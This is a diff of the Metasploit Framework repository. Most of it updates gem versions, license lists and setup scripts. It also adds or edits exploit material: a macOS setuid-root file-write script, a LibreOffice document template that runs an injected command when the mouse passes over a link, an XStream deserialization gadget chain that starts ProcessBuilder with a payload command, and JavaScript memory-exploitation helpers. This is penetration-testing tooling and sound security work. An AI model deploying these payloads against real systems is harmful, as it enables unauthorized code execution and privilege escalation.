    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.79)
+    rex-powershell (0.1.84)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -265,72 +273,75 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.15)
+    rex-socket (0.1.21)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.21)
+    rex-text (0.2.24)
    rex-zip (0.1.3)
      rex-text
    rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.0)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.2)
+    rspec (3.9.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+    rspec-core (3.9.1)
+      rspec-support (~> 3.9.1)
+    rspec-expectations (3.9.0)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.0)
+      rspec-support (~> 3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.1)
+      rspec-support (~> 3.9.0)
+    rspec-rails (3.9.0)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+      rspec-support (~> 3.9.0)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.8.0)
-    ruby-macho (2.1.0)
+    rspec-support (3.9.2)
+    ruby-macho (2.2.0)
    ruby-rc4 (0.1.5)
-    ruby_smb (1.0.5)
+    ruby_smb (1.1.0)
      bindata
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.2)
-    sawyer (0.8.1)
-      addressable (>= 2.3.5, < 2.6)
-      faraday (~> 0.8, < 1.0)
-    simplecov (0.16.1)
+    rubyzip (2.0.0)
+    sawyer (0.8.2)
+      addressable (>= 2.3.5)
+      faraday (> 0.8, < 2.0)
+    simplecov (0.17.1)
      docile (~> 1.1)
      json (>= 1.8, < 3)
      simplecov-html (~> 0.10.0)
    simplecov-html (0.10.2)
    sqlite3 (1.3.13)
-    sshkey (1.9.0)
-    thor (0.20.3)
+    sshkey (2.0.0)
+    thor (1.0.1)
    thread_safe (0.3.6)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.1)
+    tzinfo (1.2.6)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2018.7)
+    tzinfo-data (1.2019.3)
      tzinfo (>= 1.0.0)
+    websocket-driver (0.7.1)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.4)
    windows_error (0.1.2)
    xdr (2.0.0)
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.16)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -346,8 +357,9 @@ DEPENDENCIES
  rspec-rails
  rspec-rerun
  simplecov
+  sqlite3 (~> 1.3.0)
  timecop
  yard

 BUNDLED WITH
-   1.16.6
+   1.17.3
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -71,10 +71,6 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

-Files: lib/metasm.rb lib/metasm/* data/cpuinfo/*
-Copyright: 2006-2010 Yoann GUILLOT
-License: LGPL-2.1
-
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -1,130 +1,128 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.0.2, MIT
-actionpack, 4.2.9, MIT
-actionview, 4.2.9, MIT
-activemodel, 4.2.9, MIT
-activerecord, 4.2.9, MIT
-activesupport, 4.2.9, MIT
-addressable, 2.5.1, "Apache 2.0"
+Ascii85, 1.0.3, MIT
+actionpack, 4.2.11.1, MIT
+actionview, 4.2.11.1, MIT
+activemodel, 4.2.11.1, MIT
+activerecord, 4.2.11.1, MIT
+activesupport, 4.2.11.1, MIT
+addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
 arel, 6.0.4, MIT
-arel-helpers, 2.4.0, unknown
-backports, 3.8.0, MIT
-bcrypt, 3.1.11, MIT
-bindata, 2.4.0, ruby
+arel-helpers, 2.11.0, MIT
+backports, 3.15.0, MIT
+bcrypt, 3.1.12, MIT
+bcrypt_pbkdf, 1.0.1, MIT
+bindata, 2.4.4, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
-bundler, 1.15.1, MIT
-coderay, 1.1.1, MIT
+builder, 3.2.4, MIT
+bundler, 1.17.3, MIT
+coderay, 1.1.2, MIT
+concurrent-ruby, 1.0.5, MIT
+crass, 1.0.6, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.60.1, "Apache 2.0"
-docile, 1.1.5, MIT
+dnsruby, 1.61.3, "Apache 2.0"
+docile, 1.3.2, MIT
+ed25519, 1.2.4, MIT
 erubis, 2.7.0, MIT
-factory_girl, 4.8.0, MIT
-factory_girl_rails, 4.8.0, MIT
-faraday, 0.12.1, MIT
-filesize, 0.1.1, MIT
-fivemat, 1.3.5, MIT
-google-protobuf, 3.3.0, "New BSD"
-googleauth, 0.5.1, "Apache 2.0"
-grpc, 1.4.1, "New BSD"
+eventmachine, 1.2.7, "ruby, GPL-2.0"
+factory_girl, 4.9.0, MIT
+factory_girl_rails, 4.9.0, MIT
+faker, 2.2.1, MIT
+faraday, 0.17.0, MIT
+faye-websocket, 0.10.9, "Apache 2.0"
+filesize, 0.2.0, MIT
+fivemat, 1.3.7, MIT
 hashery, 2.1.2, "Simplified BSD"
-i18n, 0.8.6, MIT
+i18n, 0.9.5, MIT
 jsobfu, 0.4.2, "New BSD"
-json, 2.1.0, ruby
-jwt, 1.5.6, MIT
-little-plugger, 1.1.4, MIT
-logging, 2.2.2, MIT
-loofah, 2.0.3, MIT
-memoist, 0.16.0, MIT
-metasm, 1.0.3, LGPL
-metasploit-aggregator, 0.2.1, "New BSD"
+json, 2.3.0, ruby
+loofah, 2.4.0, MIT
+metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
-metasploit-credential, 2.0.10, "New BSD"
-metasploit-framework, 4.15.0, "New BSD"
+metasploit-credential, 2.0.14, "New BSD"
+metasploit-framework, 4.17.104, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
-metasploit-payloads, 1.2.37, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 2.0.15, "New BSD"
-metasploit_payloads-mettle, 0.1.10, "3-clause (or ""modified"") BSD"
-method_source, 0.8.2, MIT
-mini_portile2, 2.2.0, MIT
-minitest, 5.10.2, MIT
-msgpack, 1.1.0, "Apache 2.0"
-multi_json, 1.12.1, MIT
-multipart-post, 2.0.0, MIT
+metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
+metasploit_data_models, 2.0.17, "New BSD"
+metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
+method_source, 0.9.2, MIT
+mini_portile2, 2.4.0, MIT
+minitest, 5.14.0, MIT
+mqtt, 0.5.0, MIT
+msgpack, 1.3.1, "Apache 2.0"
+multipart-post, 2.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ssh, 4.1.0, MIT
-network_interface, 0.0.1, MIT
-nexpose, 6.1.0, BSD
-nokogiri, 1.8.0, MIT
-octokit, 4.7.0, MIT
-openssl-ccm, 1.2.1, MIT
+net-ssh, 5.2.0, MIT
+network_interface, 0.0.2, MIT
+nexpose, 7.2.1, "New BSD"
+nokogiri, 1.10.7, MIT
+octokit, 4.15.0, MIT
+openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
-os, 0.9.6, MIT
 packetfu, 1.1.13, BSD
 patch_finder, 1.0.2, "New BSD"
-pcaprub, 0.12.4, LGPL-2.1
-pdf-reader, 2.0.0, MIT
-pg, 0.20.0, "New BSD"
+pcaprub, 0.13.0, LGPL-2.1
+pdf-reader, 2.4.0, MIT
+pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
-postgres_ext, 3.0.0, MIT
-pry, 0.10.4, MIT
-public_suffix, 2.0.5, MIT
-rack, 1.6.8, MIT
+postgres_ext, 3.0.1, MIT
+pry, 0.12.2, MIT
+public_suffix, 4.0.3, MIT
+rack, 1.6.12, MIT
 rack-test, 0.6.3, MIT
 rails-deprecated_sanitizer, 1.0.3, MIT
-rails-dom-testing, 1.0.8, MIT
-rails-html-sanitizer, 1.0.3, MIT
-railties, 4.2.9, MIT
-rake, 12.0.0, MIT
-rb-readline, 0.5.4, BSD
-recog, 2.1.11, unknown
-redcarpet, 3.4.0, MIT
-rex-arch, 0.1.9, "New BSD"
-rex-bin_tools, 0.1.4, "New BSD"
-rex-core, 0.1.11, "New BSD"
+rails-dom-testing, 1.0.9, MIT
+rails-html-sanitizer, 1.3.0, MIT
+railties, 4.2.11.1, MIT
+rake, 13.0.1, MIT
+rb-readline, 0.5.5, BSD
+recog, 2.3.6, unknown
+redcarpet, 3.5.0, MIT
+rex-arch, 0.1.13, "New BSD"
+rex-bin_tools, 0.1.6, "New BSD"
+rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.15, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.72, "New BSD"
-rex-random_identifier, 0.1.2, "New BSD"
+rex-powershell, 0.1.84, "New BSD"
+rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
-rex-socket, 0.1.8, "New BSD"
-rex-sslscan, 0.1.4, "New BSD"
+rex-socket, 0.1.21, "New BSD"
+rex-sslscan, 0.1.5, "New BSD"
 rex-struct2, 0.1.2, "New BSD"
-rex-text, 0.2.17, "New BSD"
+rex-text, 0.2.24, "New BSD"
 rex-zip, 0.1.3, "New BSD"
 rkelly-remix, 0.0.7, MIT
-robots, 0.10.1, MIT
-rspec, 3.6.0, MIT
-rspec-core, 3.6.0, MIT
-rspec-expectations, 3.6.0, MIT
-rspec-mocks, 3.6.0, MIT
-rspec-rails, 3.6.0, MIT
+rspec, 3.9.0, MIT
+rspec-core, 3.9.1, MIT
+rspec-expectations, 3.9.0, MIT
+rspec-mocks, 3.9.1, MIT
+rspec-rails, 3.9.0, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.6.0, MIT
+rspec-support, 3.9.2, MIT
+ruby-macho, 2.2.0, MIT
 ruby-rc4, 0.1.5, MIT
-ruby_smb, 0.0.18, "New BSD"
+ruby_smb, 1.1.0, "New BSD"
 rubyntlm, 0.6.2, MIT
-rubyzip, 1.2.1, "Simplified BSD"
-sawyer, 0.8.1, MIT
-signet, 0.7.3, "Apache 2.0"
-simplecov, 0.14.1, MIT
-simplecov-html, 0.10.1, MIT
-slop, 3.6.0, MIT
+rubyzip, 2.0.0, "Simplified BSD"
+sawyer, 0.8.2, MIT
+simplecov, 0.17.1, MIT
+simplecov-html, 0.10.2, MIT
 sqlite3, 1.3.13, "New BSD"
-sshkey, 1.9.0, MIT
-thor, 0.19.4, MIT
+sshkey, 2.0.0, MIT
+thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
-tzinfo, 1.2.3, MIT
-tzinfo-data, 1.2017.2, MIT
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
+tzinfo, 1.2.6, MIT
+tzinfo-data, 1.2019.3, MIT
+websocket-driver, 0.7.1, "Apache 2.0"
+websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.9, MIT
+yard, 0.9.24, MIT
@@ -1,7 +1,7 @@
-Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://img.shields.io/codeclimate/github/rapid7/metasploit-framework.svg)](https://codeclimate.com/github/rapid7/metasploit-framework) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.svg?branch=master)](https://travis-ci.org/rapid7/metasploit-framework) [![Maintainability](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/maintainability)](https://codeclimate.com/github/rapid7/metasploit-framework/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/943e398e619c09568f3f/test_coverage)](https://codeclimate.com/github/rapid7/metasploit-framework/test_coverage) [![Docker Pulls](https://img.shields.io/docker/pulls/metasploitframework/metasploit-framework.svg)](https://hub.docker.com/r/metasploitframework/metasploit-framework/)
 ==
 The Metasploit Framework is released under a BSD-style license. See
-COPYING for more details.
+[COPYING](COPYING) for more details.

 The latest version of this software is available from: https://metasploit.com

@@ -31,7 +31,6 @@ Vagrant.configure(2) do |config|
  [ "gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3",
    "curl -L https://get.rvm.io | bash -s stable",
    "source ~/.rvm/scripts/rvm && cd /vagrant && rvm install `cat .ruby-version`",
-    "source ~/.rvm/scripts/rvm && cd /vagrant && gem install bundler",
    "source ~/.rvm/scripts/rvm && cd /vagrant && bundle",
    "mkdir -p ~/.msf4",
  ].each do |step|
@@ -1,3 +1,4 @@
+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
 require 'rails'
 require File.expand_path('../boot', __FILE__)

@@ -9,6 +9,8 @@ GEMFILE_EXTENSIONS = [
 msfenv_real_pathname = Pathname.new(__FILE__).realpath
 root = msfenv_real_pathname.parent.parent

+require File.expand_path('../rails_bigdecimal_fix', __FILE__)
+
 unless ENV['BUNDLE_GEMFILE']
  require 'pathname'

@@ -24,9 +26,12 @@ end

 begin
  require 'bundler/setup'
-rescue LoadError
-  $stderr.puts "[*] Metasploit requires the Bundler gem to be installed"
-  $stderr.puts "    $ gem install bundler"
+rescue LoadError => e
+  $stderr.puts "[*] Bundler failed to load and returned this error:"
+  $stderr.puts
+  $stderr.puts "   '#{e}'"
+  $stderr.puts
+  $stderr.puts "[*] You may need to uninstall or upgrade bundler"
  exit(1)
 end

@@ -0,0 +1,11 @@
+# Remove bigdecimal warning - start
+# https://github.com/ruby/bigdecimal/pull/115
+# https://github.com/rapid7/metasploit-framework/pull/11184#issuecomment-461971266
+# TODO: remove when upgrading from rails 4.x
+require 'bigdecimal'
+
+def BigDecimal.new(*args, **kwargs)
+  return BigDecimal(*args) if kwargs.empty?
+  BigDecimal(*args, **kwargs)
+end
+# Remove bigdecimal warning - end
@@ -1,11 +0,0 @@
-#!/bin/sh
-
-gcc -o cpuinfo.ia32.bin cpuinfo.c -static -m32 -Wall && \
-strip cpuinfo.ia32.bin && \
-gcc -o cpuinfo.ia64.bin cpuinfo.c -static -m64 -Wall && \
-strip cpuinfo.ia64.bin && \
-i586-mingw32msvc-gcc -m32 -static -Wall -o cpuinfo.exe cpuinfo.c && \
-strip cpuinfo.exe
-
-ls -la cpuinfo.ia32.bin cpuinfo.ia64.bin cpuinfo.exe
-
@@ -1,64 +0,0 @@
-// This is a slightly modified copy of the METASM pe-ia32-cpuid.rb example
-
-/*
-#!/usr/bin/env ruby
-#    This file is part of Metasm, the Ruby assembly manipulation suite
-#    Copyright (C) 2006-2009 Yoann GUILLOT
-#
-#    Licence is LGPL, see LICENCE in the top-level directory
-
-
-#
-# this sample shows the compilation of a slightly more complex program
-# it displays in a messagebox the result of CPUID
-#
-
-*/
-
-#include <unistd.h>
-#include <stdio.h>
-
-static char *featureinfo[32] = {
-	"fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8",
-	"apic", "unk10", "sep", "mtrr", "pge", "mca", "cmov", "pat",
-	"pse36", "psn", "clfsh", "unk20", "ds", "acpi", "mmx",
-	"fxsr", "sse", "sse2", "ss", "htt", "tm", "unk30", "pbe"
-}, *extendinfo[32] = {
-	"sse3", "unk1", "unk2", "monitor", "ds-cpl", "unk5-vt", "unk6", "est",
-	"tm2", "unk9", "cnxt-id", "unk12", "cmpxchg16b", "unk14", "unk15",
-	"unk16", "unk17", "unk18", "unk19", "unk20", "unk21", "unk22", "unk23",
-	"unk24", "unk25", "unk26", "unk27", "unk28", "unk29", "unk30", "unk31"
-};
-
-#define cpuid(id) __asm__( "cpuid" : "=a"(eax), "=b"(ebx), "=c"(ecx), "=d"(edx) : "a"(id), "b"(0), "c"(0), "d"(0))
-#define b(val, base, end) ((val << (31-end)) >> (31-end+base))
-int main(void)
-{
-
-	unsigned long eax, ebx, ecx, edx;
-	unsigned long i;
-
-	cpuid(0);
-	fprintf(stdout, "VENDOR: %.4s%.4s%.4s\n", (char *)&ebx, (char *)&edx, (char *)&ecx);
-
-	cpuid(1);
-	fprintf(stdout, "MODEL: family=%ld model=%ld stepping=%ld efamily=%ld emodel=%ld ",
-			b(eax, 8, 11), b(eax, 4, 7), b(eax, 0, 3), b(eax, 20, 27), b(eax, 16, 19));
-	fprintf(stdout, "brand=%ld cflush sz=%ld*8 nproc=%ld apicid=%ld\n",
-			b(ebx, 0, 7), b(ebx, 8, 15), b(ebx, 16, 23), b(ebx, 24, 31));
-
-	fprintf(stdout, "FLAGS:");
-	for (i=0 ; i<32 ; i++)
-		if (edx & (1 << i))
-			fprintf(stdout, " %s", featureinfo[i]);
-
-	for (i=0 ; i<32 ; i++)
-		if (ecx & (1 << i))
-			fprintf(stdout, " %s", extendinfo[i]);
-
-	fprintf(stdout, "\n");
-	fflush(stdout);
-
-	return 0;
-}
-
@@ -27,7 +27,7 @@ def use_old_api():
 args = sys.argv

 if len(args) != 3:
-    print "usage: exploit.py source_binary dest_binary_as_root"
+    print("usage: exploit.py source_binary dest_binary_as_root")
    sys.exit(-1)

 source_binary = args[1]
@@ -42,7 +42,7 @@ attr = NSMutableDictionary.alloc().init()
 attr.setValue_forKey_(04777, NSFilePosixPermissions)
 data = NSData.alloc().initWithContentsOfFile_(source_binary)

-print "will write file", dest_binary
+print("will write file", dest_binary)

 if use_old_api():
    adm_lib = load_lib("/Admin.framework/Admin")
@@ -68,6 +68,6 @@ else:
    tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)


-print "Done!"
+print("Done!")

 del pool
@@ -0,0 +1,46 @@
+<?xml version="1.0" encoding="UTF-8"?>
+
+<office:document xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:config="urn:oasis:names:tc:opendocument:xmlns:config:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2" office:mimetype="application/vnd.oasis.opendocument.text">
+ <office:meta><meta:creation-date>2019-01-30T10:53:06.762000000</meta:creation-date><dc:date>2019-01-30T10:53:49.512000000</dc:date><meta:editing-duration>PT44S</meta:editing-duration><meta:editing-cycles>1</meta:editing-cycles><meta:document-statistic meta:table-count="0" meta:image-count="0" meta:object-count="0" meta:page-count="1" meta:paragraph-count="1" meta:word-count="1" meta:character-count="4" meta:non-whitespace-character-count="4"/><meta:generator>LibreOffice/6.1.2.1$Windows_X86_64 LibreOffice_project/65905a128db06ba48db947242809d14d3f9a93fe</meta:generator></office:meta>
+ <office:scripts>
+  <office:script script:language="ooo:Basic">
+   <ooo:libraries xmlns:ooo="http://openoffice.org/2004/office" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <ooo:library-embedded ooo:name="Standard"/>
+   </ooo:libraries>
+  </office:script>
+ </office:scripts>
+ <office:styles>
+  <style:default-style style:family="graphic">
+   <style:graphic-properties svg:stroke-color="#3465a4" draw:fill-color="#729fcf" fo:wrap-option="no-wrap" draw:shadow-offset-x="0.1181in" draw:shadow-offset-y="0.1181in" draw:start-line-spacing-horizontal="0.1114in" draw:start-line-spacing-vertical="0.1114in" draw:end-line-spacing-horizontal="0.1114in" draw:end-line-spacing-vertical="0.1114in" style:flow-with-text="false"/>
+   <style:paragraph-properties style:text-autospace="ideograph-alpha" style:line-break="strict" style:font-independent-line-spacing="false">
+    <style:tab-stops/>
+   </style:paragraph-properties>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN"/>
+  </style:default-style>
+  <style:default-style style:family="paragraph">
+   <style:paragraph-properties fo:orphans="2" fo:widows="2" fo:hyphenation-ladder-count="no-limit" style:text-autospace="ideograph-alpha" style:punctuation-wrap="hanging" style:line-break="strict" style:tab-stop-distance="0.4925in" style:writing-mode="page"/>
+   <style:text-properties style:use-window-font-color="true" style:font-name="Liberation Serif" fo:font-size="96pt" fo:language="en" fo:country="US" style:letter-kerning="true" style:font-name-asian="NSimSun" style:font-size-asian="96pt" style:language-asian="zh" style:country-asian="CN" style:font-name-complex="Arial" style:font-size-complex="96pt" style:language-complex="hi" style:country-complex="IN" fo:hyphenate="false" fo:hyphenation-remain-char-count="2" fo:hyphenation-push-char-count="2"/>
+  </style:default-style>
+  <style:default-style style:family="table">
+   <style:table-properties table:border-model="collapsing"/>
+  </style:default-style>
+  <style:default-style style:family="table-row">
+   <style:table-row-properties fo:keep-together="auto"/>
+  </style:default-style>
+  <style:style style:name="Standard" style:family="paragraph" style:class="text"/>
+  <style:style style:name="Text_20_body" style:display-name="Text body" style:family="paragraph" style:parent-style-name="Standard" style:class="text">
+   <style:paragraph-properties fo:margin-top="0in" fo:margin-bottom="0.0972in" loext:contextual-spacing="false" fo:line-height="115%"/>
+  </style:style>
+  <style:style style:name="Internet_20_link" style:display-name="Internet link" style:family="text">
+   <style:text-properties fo:color="#ffffff" fo:language="zxx" fo:country="none" style:text-underline-style="solid" style:text-underline-width="auto" style:text-underline-color="font-color" style:language-asian="zxx" style:country-asian="none" style:language-complex="zxx" style:country-complex="none"/>
+  </style:style>
+ </office:styles>
+ <office:master-styles>
+  <style:master-page style:name="Standard" style:page-layout-name="pm1"/>
+ </office:master-styles>
+ <office:body>
+  <office:text>
+   <text:p text:style-name="Standard"><text:a xlink:type="simple" xlink:href="http://<%=text_content%>/" text:style-name="Internet_20_link" text:visited-style-name="Visited_20_Internet_20_Link"><office:event-listeners><script:event-listener script:language="ooo:script" script:event-name="dom:mouseover" xlink:href="vnd.sun.star.script:<%= path %>$tempfilepager(1, <%= @cmd %>)?language=Python&amp;location=share" xlink:type="simple"/></office:event-listeners><text:span text:style-name="T1"><%= text_content %></text:span></text:a></text:p>
+  </office:text>
+ </office:body>
+</office:document>
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -79,6 +79,18 @@ function Int64(v) {
        return '0x' + hexlify(Array.from(bytes).reverse());
    };

+    this.lo = function()
+    {
+        var b = this.bytes();
+        return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+    };
+
+    this.hi = function()
+    {
+        var b = this.bytes();
+        return (b[4] | (b[5] << 8) | (b[6] << 16) | (b[7] << 24)) >>> 0;
+    };
+
    // Basic arithmetic.
    // These functions assign the result of the computation to their 'this' object.

@@ -46,6 +46,139 @@ function hexdump(data) {
    return lines.join('\n');
 }

+function strcmp(b, str)
+{
+    var fn = typeof b == "function" ? b : function(i) { return b[i]; };
+    for(var i = 0; i < str.length; ++i)
+    {
+        if(fn(i) != str.charCodeAt(i))
+        {
+            return false;
+        }
+    }
+    return fn(str.length) == 0;
+}
+
+function b2u32(b)
+{
+    return (b[0] | (b[1] << 8) | (b[2] << 16) | (b[3] << 24)) >>> 0;
+}
+
+
+
+function off2addr(segs, off)
+{
+    if(!(off instanceof Int64)) off = new Int64(off);
+    for(var i = 0; i < segs.length; ++i)
+    {
+        var start = segs[i].fileoff;
+        var end   = Add(start, segs[i].size);
+        if
+        (
+            (start.hi() < off.hi() || (start.hi() == off.hi() && start.lo() <= off.lo())) &&
+            (end.hi() > off.hi() || (end.hi() == off.hi() && end.lo() > off.lo()))
+        )
+        {
+            return Add(segs[i].addr, Sub(off, start));
+        }
+    }
+    return new Int64("0x4141414141414141");
+}
+
+function fsyms(mem, base, segs, want, syms)
+{
+    want = Array.from(want); // copy
+    if(syms === undefined)
+    {
+        syms = {};
+    }
+
+    var stab = null;
+    var ncmds = mem.u32(Add(base, 0x10));
+    for(var i = 0, off = 0x20; i < ncmds; ++i)
+    {
+        var cmd = mem.u32(Add(base, off));
+        if(cmd == 0x2) // LC_SYMTAB
+        {
+            var b = mem.read(Add(base, off + 0x8), 0x10);
+            stab =
+            {
